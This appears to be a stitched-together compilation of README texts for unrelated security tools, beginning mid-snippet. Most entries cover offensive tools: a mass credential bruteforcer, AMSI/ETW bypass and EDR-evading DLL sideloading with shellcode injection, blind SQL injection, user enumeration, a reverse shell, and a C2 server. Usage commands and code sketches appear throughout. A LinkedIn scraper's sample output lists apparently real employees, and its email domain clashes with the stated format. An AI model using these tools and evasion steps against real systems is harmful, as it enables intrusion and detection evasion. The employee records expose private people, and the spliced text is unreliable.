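print(result)  # e.g. {'Sample Size': 68, 'Risk Level': 32768, 'Message': '...'}
```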
Risk Level | Meaning |
---|---|
0 | AMSI_RESULT_CLEAN (File is clean) |
1 | AMSI_RESULT_NOT_DETECTED (No threat detected) |
16384 | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator) |
20479 | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator) |
32768 | AMSI_RESULT_DETECTED (File is considered malware) |
https://tomiwa-ot.github.io/py-amsi/index.html
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.
- Use `masscan` (faster than nmap) to find alive hosts with common ports from network segment.
- Parse the `masscan` result.
- Generate `hydra` commands to automatically bruteforce supported network services on devices.

Requirements:

- `Kali linux` or any preferred linux distribution
- `Python 3.10+`
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private IP ranges: `10.0.0.0/8`, `192.168.0.0/16`, `172.16.0.0/12`

Save masscan results under `./result/masscan/`, with the format `masscan_<name>.<ext>`. Ex: `masscan_192.168.0.0-16.txt`
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
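The glue between masscan and hydra is just parsing the `Discovered open port <port>/tcp on <ip>` lines and grouping targets per service. A rough sketch of that step (illustrative; the file name, service map, and wordlists are placeholders, not the script's actual logic):

```python
# Illustrative masscan-output parser that emits hydra commands (placeholders throughout)
import re
from collections import defaultdict

SERVICES = {21: "ftp", 22: "ssh", 23: "telnet", 1433: "mssql", 3306: "mysql"}
PATTERN = re.compile(r"Discovered open port (\d+)/tcp on ([\d.]+)")

targets = defaultdict(list)
with open("result/masscan/masscan_test.txt") as f:
    for port, ip in PATTERN.findall(f.read()):
        if int(port) in SERVICES:
            targets[SERVICES[int(port)]].append(ip)

for service, ips in targets.items():
    for ip in ips:
        print(f"hydra -L users.txt -P passwords.txt {service}://{ip}")
```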
Command Options
┌──(root㉿root)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcome!
LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).
LightsOut is designed to work on Linux systems with `python3` and `mingw-w64` installed. No other dependencies are required.
Features currently include:
_______________________
| |
| AMSI + ETW |
| |
| LIGHTS OUT |
| _______ |
| || || |
| ||_____|| |
| |/ /|| |
| / / || |
| /____/ /-' |
| |____|/ |
| |
| @icyguider |
| |
| RG|
`-----------------------'
usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]
Generate an obfuscated DLL that will disable AMSI & ETW
options:
-h, --help show this help message and exit
-m <method>, --method <method>
Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox <option>
Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
-sa <value>, --sandbox-arg <value>
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-k <key>, --key <key>
Key to encode strings with (randomly generated by default)
-o <outfile>, --outfile <outfile>
File to save DLL to
Remote options:
-p <pid>, --pid <pid>
PID of remote process to patch
Intended Use/Opsec Considerations
This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.
Usage Examples
You can transfer the output DLL to your target system and load it into powershell in various ways. For example, it can be done via P/Invoke with LoadLibrary:
Or even easier, copy powershell to an arbitrary location and side load the DLL!
Greetz/Credit/Further Reference:
HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers & bug bounty hunters to test the security of web applications.
This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.
The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.
Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.
By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.
Install HBSQLI with following steps:
$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt
usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]
options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v
There are basically two modes in this: verbose, which will show you the whole process and the status of each test done, and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v to your command.
You can use the provided payload file or a custom payload file; just remember that the delay in each payload in the payload file should be set to 30 seconds.
You can use the provided headers file or add more custom headers to that file according to your needs.
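At its core, header-based blind SQL injection detection is a timing comparison: inject a payload that sleeps (30 seconds here) into a header and flag the URL if the response stalls accordingly. A simplified sketch of that logic (not HBSQLI's actual code; the header and payload are examples):

```python
# Simplified time-based check (illustrative; HBSQLI adds baselining, lists, retries, etc.)
import time
import requests

def looks_injectable(url: str, header: str, payload: str, delay: int = 30) -> bool:
    start = time.monotonic()
    try:
        requests.get(url, headers={header: payload}, timeout=delay + 15)
    except requests.exceptions.Timeout:
        return True  # response stalled well past the injected delay
    return time.monotonic() - start >= delay

if looks_injectable("https://target.com", "X-Forwarded-For", "1' AND SLEEP(30)-- -"):
    print("potentially vulnerable")
```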
Designed to validate potential usernames by querying OneDrive and/or Microsoft Teams, which are passive methods.
Additionally, it can output/create a list of legacy Skype users identified through Microsoft Teams enumeration.
Finally, it also creates a nice clean list for future usage, all conducted from a single tool.
$ python3 .\KnockKnock.py -h
_ __ _ _ __ _
| |/ /_ __ ___ ___| | _| |/ /_ __ ___ ___| | __
| ' /| '_ \ / _ \ / __| |/ / ' /| '_ \ / _ \ / __| |/ /
| . \| | | | (_) | (__| <| . \| | | | (_) | (__| <
|_|\_\_| |_|\___/ \___|_|\_\_|\_\_| |_|\___/ \___|_|\_\
v0.9 Author: @waffl3ss
usage: KnockKnock.py [-h] [-teams] [-onedrive] [-l] -i INPUTLIST [-o OUTPUTFILE] -d TARGETDOMAIN [-t TEAMSTOKEN] [-threads MAXTHREADS] [-v]
options:
-h, --help show this help message and exit
-teams Run the Teams User Enumeration Module
-onedrive Run the One Drive Enumeration Module
-l Write legacy skype users to a separate file
-i INPUTLIST Input file with newline-separated users to check
-o OUTPUTFILE Write output to file
-d TARGETDOMAIN Domain to target
-t TEAMSTOKEN Teams Token (file containing token or a string)
-threads MAXTHREADS Number of threads to use in the Teams User Enumeration (default = 10)
-v Show verbose errors
./KnockKnock.py -teams -i UsersList.txt -d Example.com -o OutFile.txt -t BearerToken.txt
./KnockKnock.py -onedrive -i UsersList.txt -d Example.com -o OutFile.txt
./KnockKnock.py -onedrive -teams -i UsersList.txt -d Example.com -t BearerToken.txt -l
To get your bearer token, you will need a Cookie Manager plugin on your browser and login to your own Microsoft Teams through the browser.
Next, view the cookies related to the current webpage (teams.microsoft.com).
The cookie you are looking for is for the domain .teams.microsoft.com and is titled "authtoken".
You can copy the whole token as the script will split out the required part for you.
@nyxgeek - onedrive_user_enum
@immunIT - TeamsUserEnum
ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that ADCSKiller is currently in its first drafts and will undergo further refinements and additions in future updates.
Since this tool relies on Certipy and Coercer, both tools have to be installed first.
git clone https://github.com/ly4k/Certipy && cd Certipy && python3 setup.py install
git clone https://github.com/p0dalirius/Coercer && cd Coercer && pip install -r requirements.txt && python3 setup.py install
git clone https://github.com/grimlockx/ADCSKiller/ && cd ADCSKiller && pip install -r requirements.txt
Usage: adcskiller.py [-h] -d DOMAIN -u USERNAME -p PASSWORD -t TARGET -l LEVEL -L LHOST
Options:
-h, --help Show this help message and exit.
-d DOMAIN, --domain DOMAIN
Target domain name. Use FQDN
-u USERNAME, --username USERNAME
Username.
-p PASSWORD, --password PASSWORD
Password.
-dc-ip TARGET, --target TARGET
IP Address of the domain controller.
-L LHOST, --lhost LHOST
FQDN of the listener machine - An ADIDNS is probably required
HTTP-Shell is a multiplatform reverse shell. This tool helps you obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.
This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection and movement between directories.
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/HTTP-Shell
https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec).
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
How PurpleOps is different:
# Clone this repository
$ git clone https://github.com/CyberCX-STA/PurpleOps
# Go into the repository
$ cd PurpleOps
# Alter PurpleOps settings (if you want to customize anything but should work out the box)
$ nano .env
# Run the app with docker
$ sudo docker compose up
# PurpleOps should now be available on http://localhost:5000; it is recommended to add a reverse proxy such as nginx or Apache in front of it if you want to expose it to the outside world.
# Alternatively
$ sudo docker run --name mongodb -d -p 27017:27017 mongo
$ pip3 install -r requirements.txt
$ python3 seeder.py
$ python3 purpleops.py
We would love to hear back from you. If something is broken or you have an idea to make it better, add a ticket or ping us: pops@purpleops.app | @_w_m__
DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.
git clone https://github.com/HalilDeniz/DNSWatch.git
pip install -r requirements.txt
python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
- `-i`, `--interface` : Specify the network interface (e.g., eth0).
- `-v`, `--verbose` : Use this flag for more verbose output.
- `-o`, `--output` : Specify the filename to save results.
- `-t`, `--target-ip` : Specify a specific target IP address to monitor.
- `-adt`, `--analyze-dns-types` : Analyze DNS types.
- `--doh` : Use DNS over HTTPS (DoH) for resolving DNS requests.
- `-fd`, `--target-domains` : Filter DNS requests by specified domains.
- `-d`, `--database` : Enable database storage for DNS requests.

Press `Ctrl+C` to stop the sniffing process.
python dnswatch.py -i eth0
python dnswatch.py -i eth0 -o dns_results.txt
python dnswatch.py -i eth0 -k 192.168.1.100
python dnswatch.py -i eth0 --analyze-dns-types
python dnswatch.py -i eth0 --doh
python3 dnswatch.py -i wlan0 --database
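Sniffers of this kind are typically built on scapy: capture UDP port 53 and print the query name from each DNS request. A minimal standalone equivalent of the default mode (a sketch, not DNSWatch's code; requires scapy and root privileges):

```python
# Minimal DNS-request sniffer with scapy (illustrative; run as root)
from scapy.all import sniff, DNS, DNSQR, IP

def show(pkt):
    # qr == 0 marks a query (as opposed to a response)
    if pkt.haslayer(IP) and pkt.haslayer(DNSQR) and pkt[DNS].qr == 0:
        print(f"{pkt[IP].src} -> {pkt[DNSQR].qname.decode()}")

sniff(iface="eth0", filter="udp port 53", prn=show, store=False)
```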
DNSWatch is licensed under the MIT License. See the LICENSE file for details.
This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.
While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.
To automate the DLL sideloading process and make it more effective, Chimera was created: a tool that includes evasion methodologies to bypass EDR/AV products. The tool can automatically encrypt a shellcode via XOR with a random key and create template images that can be imported into Visual Studio to create a malicious DLL.
Dynamic syscalls from SysWhispers2 are also used, with a modified assembly version to evade the patterns that EDRs search for; random NOP sleds are added and registers are moved around. Furthermore, Early Bird injection is used to inject the shellcode into another process, which the user can specify, with sandbox evasion mechanisms like a hard disk check and a check on whether the process is being debugged. Finally, a timing attack is placed in the loader, which uses waitable timers to delay the execution of the shellcode.
This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.
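The XOR-encoding step can be illustrated in a few lines: pick a random key, XOR every shellcode byte, and emit the result as a C array for the DLL template. This is a sketch of the concept only; Chimera's actual key handling and output format may differ:

```python
# Concept sketch: XOR-encode shellcode and emit a C array (not Chimera's exact format)
import os

shellcode = open("met.bin", "rb").read()
key = os.urandom(1)[0]  # single-byte key for simplicity
encoded = bytes(b ^ key for b in shellcode)

print(f"unsigned char key = 0x{key:02x};")
print("unsigned char buf[] = {" + ", ".join(f"0x{b:02x}" for b in encoded) + "};")
```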
Chimera is written in python3 and there is no need to install any extra dependencies.
Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.
Someone can create userenv.dll, a DLL missing from Microsoft Teams, and insert it into the specific folder:

%USERPROFILE%/AppData/Local/Microsoft/Teams/current

For Microsoft OneDrive, the script uses version.dll, a common choice because it is missing from binaries such as onedriveupdater.exe.
python3 ./chimera.py met.bin chimera_automation notepad.exe teams
python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive
Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.
For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.
Step 1: Creating a New Visual Studio Project with DLL Template
Step 2: Importing Images into the Visual Studio Project
Step 3: Build Customization
Step 4: Enable MASM
Step 5:
Step 1: Change optimization
Step 2: Remove Debug Information
To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource
https://evasions.checkpoint.com/
https://github.com/Flangvik/SharpDllProxy
https://github.com/jthuraisamy/SysWhispers2
https://github.com/Mr-Un1k0d3r
Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.
Gold Digger requires Python3.
virtualenv -p python3 .
source bin/activate
python dig.py --help
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]
optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output
Gold Digger will recursively go through all folders and files in search of content matching items listed in the `gold.json` file. Additionally, you can leverage an exclusion file called `exclusions.json` for skipping files matching specific extensions. Provide the root folder as the `--directory` flag.
An example structure could be:
~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/
You would provide the following command to parse all 3 folders:
python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log
The tool will create a log file containing the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.
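Conceptually, the scan is a recursive walk that applies each regex from `gold.json` to every non-excluded file. A compact sketch of that loop (the JSON layouts shown are assumptions for illustration, not necessarily Gold Digger's exact schema):

```python
# Compact sketch of the recursive regex scan (gold.json/exclusions.json layouts assumed)
import json, os, re

with open("gold.json") as f:
    gold = {name: re.compile(rx) for name, rx in json.load(f).items()}
with open("exclusions.json") as f:
    excluded = set(json.load(f))  # e.g. [".png", ".zip"]

for root, _, files in os.walk(os.path.expanduser("~/Engagements/CustomerName/data/")):
    for name in files:
        if os.path.splitext(name)[1].lower() in excluded:
            continue
        path = os.path.join(root, name)
        try:
            with open(path, errors="ignore") as fh:
                text = fh.read()
        except OSError:
            continue
        for label, rx in gold.items():
            if rx.search(text):
                print(f"[{label}] {path}")
```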
Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger comes from this amazing project.
These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.
The scripts are located in the `scripts/` directory. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the `scripts/config/` directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The `scripts/lib/` directory contains code that is shared between different scripts.

Scripts using a `monitor_` prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state of the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the `--init` argument.
Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.
The shared configuration file `scripts/config/config.py` contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the `scripts/config/` directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing `start_search.py` (which is located in the main directory) or by executing each script manually. A Python 3 interpreter is needed to run the scripts.

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).
2. Configure the scripts that you want to run using the configuration files in the `scripts/config/` directory.
3. Execute `start_search.py` with the `--init` argument to initialize the scripts with the `monitor_` prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.
4. Set up a cron job as `root` user that executes `start_search.py` (e.g., `0 * * * * root /opt/LSMS/start_search.py` to start the search hourly).
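To illustrate the `monitor_` pattern, such a script boils down to hashing the watched resource, comparing it against the stored state, and re-baselining on `--init`. A simplified sketch (not one of the actual scripts; the state path is hypothetical):

```python
# Simplified monitor_ pattern: alert when /etc/hosts changes (illustrative sketch)
import hashlib, json, os, sys

STATE_FILE = "/opt/LSMS/state/hosts.json"  # hypothetical state location

def file_hash(path: str) -> str:
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

current = file_hash("/etc/hosts")
if "--init" in sys.argv or not os.path.exists(STATE_FILE):
    os.makedirs(os.path.dirname(STATE_FILE), exist_ok=True)
    with open(STATE_FILE, "w") as f:
        json.dump({"hash": current}, f)  # establish (or reset) the benign baseline
else:
    with open(STATE_FILE) as f:
        if json.load(f)["hash"] != current:
            print("ALERT: /etc/hosts changed since baseline")  # or send via mail/AlertR
```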
Name | Script |
---|---|
Monitoring cron files | monitor_cron.py |
Monitoring /etc/hosts file | monitor_hosts_file.py |
Monitoring /etc/ld.so.preload file | monitor_ld_preload.py |
Monitoring /etc/passwd file | monitor_passwd.py |
Monitoring modules | monitor_modules.py |
Monitoring SSH authorized_keys files | monitor_ssh_authorized_keys.py |
Monitoring systemd unit files | monitor_systemd_units.py |
Search executables in /dev/shm | search_dev_shm.py |
Search fileless programs (memfd_create) | search_memfd_create.py |
Search hidden ELF files | search_hidden_exe.py |
Search immutable files | search_immutable_files.py |
Search kernel thread impersonations | search_non_kthreads.py |
Search processes that were started by a now disconnected SSH session | search_ssh_leftover_processes.py |
Search running deleted programs | search_deleted_exe.py |
Test script to check if alerting works | test_alert.py |
Verify integrity of installed .deb packages | verify_deb_packages.py |
Python 3 script to dump company employees from LinkedIn API
LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.
The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the `--email-format` CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.
LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.
- Obtain a valid `li_at` session cookie value, e.g. via developer tools
- Provide the cookie statically as `li_at` or temporarily during runtime via the CLI flag `--cookie`
usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]
options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'
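These patterns are ordinary Python `str.format` templates applied to the lowercased first and last name: `{0}` is the first name, `{1}` the last name, and `{0[0]}` indexes the first character:

```python
# How the --email-format templates expand (plain str.format semantics)
first, last = "john", "doe"
for fmt in ("{0}.{1}@example.com", "{0[0]}.{1}@example.com", "{0[0]}{1[0]}@example.com"):
    print(fmt.format(first, last))
# john.doe@example.com
# j.doe@example.com
# jd@example.com
```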
docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
# install dependencies
pip install -r requirements.txt
python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
The script will return employee data as semi-colon separated values (like CSV):
[LinkedInDumper ASCII-art banner] by LRVT
[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter
[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-
LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reach the maximum allowed queries for visiting profiles with your freemium LinkedIn account.
Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag `--include-private-profiles`. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.
Finally, LinkedIn users are free to name their profile. An account name can therefore consist of various things such as salutations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.
KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.
The GIF below demonstrates usage of the tool:
KubeStalk is written in Python and requires the `requests` library.

To install the tool, you can clone the repository to any directory:

git clone https://github.com/redhuntlabs/kubestalk

Once cloned, you need to install the `requests` library using `python3 -m pip install requests` or:

python3 -m pip install -r requirements.txt

Everything is set up and you can use the tool directly.

A list of command line arguments supported by the tool can be displayed using the `-h` flag.
$ python3 kubestalk.py -h
+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1
[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.
usage: ./kubestalk.py <url(s)>/<cidr>
Required Arguments:
urls List of hosts to scan
Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header to set in HTTP requests
--concurrency CONCURRENCY
No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.
To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 compliant, i.e. must contain a scheme and hostname (and port if required).
A basic usage is as below:
$ python3 kubestalk.py https://███.██.██.███:10250
+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1
[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.
[+] Loaded 10 signatures to scan.
[*] Processing host: https://███.██.██.██:10250
[!] Found potential issue on https://███.██.██.██:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.
HTTP requests can be fine-tuned using the `-t` (to mention HTTP timeouts), `-ua` (to specify custom user agents) and the `--verify-ssl` (to validate SSL certificates while making requests) flags.

You can control the number of hosts to scan simultaneously using the `--concurrency` flag. The default value is set to 5.

The output is written to a CSV file and can be controlled by the `--output` flag.
A sample of the CSV output rendered in markdown is as below:
host | path | issue | type | severity |
---|---|---|---|---|
https://█.█.█.█:10250 | /pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
https://█.█.█.█:443 | /api/v1/pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
http://█.█.██.█:80 | / | etcd Viewer Dashboard Exposure | add-on | vulnerability/exposure |
http://██.██.█.█:80 | / | cAdvisor Metrics Web UI Dashboard Exposure | add-on | vulnerability/exposure |
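Each signature boils down to a path plus a response fingerprint; the kubelet pod-list check above, for instance, amounts to requesting `/pods` and looking for a `PodList` body. A standalone sketch of that single check (illustrative, not KubeStalk's signature format):

```python
# Illustrative single-signature probe: unauthenticated kubelet pod list
import requests

def pod_list_exposed(base_url: str, timeout: int = 5) -> bool:
    try:
        r = requests.get(f"{base_url}/pods", timeout=timeout, verify=False)
        return r.status_code == 200 and "PodList" in r.text
    except requests.RequestException:
        return False

if pod_list_exposed("https://10.0.0.1:10250"):  # placeholder target
    print("Kubernetes Pod List Exposure")
```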
The tool is licensed under the BSD 3 Clause License and is currently at v0.1.
To know more about our Attack Surface Management platform, check out NVADR.
Striker is a simple Command and Control (C2) program.
This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.
A) Agents
B) Backend / Teamserver
C) User Interface
Clone the repo;
$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker
The codebase is divided into 4 independent sections;
This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

- `express` - For the REST API.
- `socket.io` - For Web Socket communication.
- `mongoose` - For connecting to MongoDB.
- `multer` - For handling file uploads.
- `bcrypt` - For hashing user passwords.

The source code is in the `backend/` directory. To setup the server;
Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).
$ cd backend
$ npm install
$ mkdir static
You can use this folder to host static files on the server. This should also be where your `UPLOAD_LOCATION` is set to in the `.env` file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path `/static/`.
Create a `.env` file;

NOTE: Values between `<` and `>` are placeholders. Replace them with appropriate values (including the `<>`). For fields that require random strings, you can generate them easily using;
$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
